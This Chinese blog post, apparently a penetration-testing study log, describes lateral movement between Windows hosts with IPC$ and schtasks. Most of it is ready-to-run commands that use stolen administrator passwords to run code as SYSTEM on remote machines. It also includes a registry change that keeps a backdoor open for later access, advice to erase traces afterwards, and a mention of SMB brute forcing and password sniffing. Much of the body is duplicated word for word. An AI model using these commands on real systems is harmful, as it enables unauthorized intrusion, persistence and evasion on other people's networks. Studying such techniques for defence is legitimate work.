记录内网渗透学习进程--DAY17
作者:互联网
IPC+计划任务进⾏横向移动2
schtasks远程命令执⾏
使⽤条件:启动Task Scheduler服务,获取目标的明文密码
至于怎么拿到目标的明文密码呢,SMB爆破和密码嗅探
在⽬标系统启动的时候以system运⾏命令
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr "cmd.exe /c whoami" /ru system /f
在⽬标系统建⽴⼀个任务,等待攻击者启动
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc DAILY /tr "cmd.exe /c whoami>c:\rules.log" /ru system /f
启动⽬标系统的test任务
schtasks /run /s <target ip> /u workgroup\administrator /p "<password>" /tn "test" /i
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr c:\programdata\test.bat /ru system /f 查看⽬标建⽴的计划任务是否正确
schtasks /query /s <target ip> /u workgroup\administrator /p "<password>" | findstr test 删除⽬标已经建⽴的计划任务
schtasks /delete /s<target ip> /u workgroup\administrator /p "<password>" /tn "test" /f #用完一定要清理痕迹 问题点:
1.win7/win2008开始的uac导致⾮rid为500的都不能连 如果我们获取到了目标的权限后,可以在注册表上留下后面,方便我们日后再次连接
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
添加之后,我们是只可以make_token 明⽂,然后ls成功,测试⽬标机器是:win7,但是使⽤hash注⼊的话是不影响的。
2.win7/win2008开始的禁⽌at命令 (make_token之后,直接使⽤schtasks而不⽤密码可⾏否?hash注⼊之后呢?)
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr "cmd.exe /c whoami" /ru system /f
在⽬标系统建⽴⼀个任务,等待攻击者启动
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc DAILY /tr "cmd.exe /c whoami>c:\rules.log" /ru system /f
启动⽬标系统的test任务
schtasks /run /s <target ip> /u workgroup\administrator /p "<password>" /tn "test" /i
在⽬标系统启动的时候以system运⾏脚本
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr c:\programdata\test.bat /ru system /f 查看⽬标建⽴的计划任务是否正确
schtasks /query /s <target ip> /u workgroup\administrator /p "<password>" | findstr test 删除⽬标已经建⽴的计划任务
schtasks /delete /s<target ip> /u workgroup\administrator /p "<password>" /tn "test" /f #用完一定要清理痕迹 问题点:
1.win7/win2008开始的uac导致⾮rid为500的都不能连 如果我们获取到了目标的权限后,可以在注册表上留下后面,方便我们日后再次连接
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
添加之后,我们是只可以make_token 明⽂,然后ls成功,测试⽬标机器是:win7,但是使⽤hash注⼊的话是不影响的。
2.win7/win2008开始的禁⽌at命令 (make_token之后,直接使⽤schtasks而不⽤密码可⾏否?hash注⼊之后呢?)
标签:administrator,schtasks,workgroup,--,system,tn,渗透,DAY17,test 来源: https://www.cnblogs.com/paku/p/14729995.html